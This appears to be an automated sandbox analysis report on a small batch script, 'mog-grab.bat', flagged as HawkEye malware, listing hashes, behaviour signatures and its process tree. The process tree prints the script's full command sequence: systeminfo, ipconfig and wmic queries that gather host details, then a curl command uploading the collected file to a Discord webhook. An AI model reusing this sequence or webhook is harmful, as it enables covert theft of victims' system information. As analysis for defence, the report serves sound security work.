Analysis

  • max time kernel
    92s
  • max time network
    94s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    04-11-2024 18:12

General

  • Target

    mog-grab.bat

  • Size

    1KB

  • MD5

    56d860629dd34b3e1ee315836d1ea2c8

  • SHA1

    228c847b5ff10c72e81f4e3f40f55ea4bd9f462d

  • SHA256

    ac263079dd4322dfbeff397cec03ffaa361815fb3b8795773c1a299650e4a9ca

  • SHA512

    dbbda5b65c0cf86d922e4a16c05f974e807328695b3f2b18a9fb216f3dcd0b55807f203c149a81918c2d8857fcbb4dccc3d7b3bf7717fb43eb09105ed37a9b47

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Hawkeye family
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Detects videocard installed (1 TTP, 1 IoC)

    Uses WMIC.exe to determine the installed video card.

  • Gathers network information (2 TTPs, 3 IoCs)

    Uses a command-line utility to view the network configuration.

  • Gathers system information (1 TTP, 1 IoC)

    Runs systeminfo.exe.

  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of WriteProcessMemory (30 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mog-grab.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:4756
    • C:\Windows\system32\ipconfig.exe
      ipconfig /all
      2⤵
      • Gathers network information
      PID:432
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ipconfig | findstr "IPv4 Address"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4380
      • C:\Windows\system32\ipconfig.exe
        ipconfig
        3⤵
        • Gathers network information
        PID:2084
      • C:\Windows\system32\findstr.exe
        findstr "IPv4 Address"
        3⤵
        PID:648
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ipconfig | findstr "IPv6 Address"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:880
      • C:\Windows\system32\ipconfig.exe
        ipconfig
        3⤵
        • Gathers network information
        PID:1880
      • C:\Windows\system32\findstr.exe
        findstr "IPv6 Address"
        3⤵
        PID:2852
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get name,description /value
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:244
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic bios get name,version,serialnumber /value
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:248
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_videocontroller get name,adapterram /value
      2⤵
      • Detects videocard installed
      PID:2732
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get product,manufacturer,serialnumber,version /value
      2⤵
      PID:1176
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get model,size /value
      2⤵
      PID:2360
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic memorychip get capacity,manufacturer,partnumber,speed /value
      2⤵
      PID:2516
    • C:\Windows\system32\curl.exe
      curl --ssl-no-revoke -F "[email protected]" https://discord.com/api/webhooks/1303034513256874039/rvIOtKCnMFcNztPrNc2yMIpVKRZ1NJ7FMhgrYGvtpQSV65OhpnAl3yBDnhCpbvoFxOXB
      2⤵
      PID:2880

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

    Filesize
    3KB

    MD5
    8af13ed45fcc0004223f6e8b3e51fbe5

    SHA1
    94e389f4cfeef81935287007a3bd420e83b839d9

    SHA256
    b28f71cf00c13945fd5f5bea049a26b37064c02b97a5d19dd7e3e4f6103cb1ff

    SHA512
    843faf115700a1093559d2dfeff17cb7034a2e53634e16057d9d2bc3921f991fecee4285a5ece31d4171fc1b9edafdcca904a53257177b0a842ab2713eb3f52e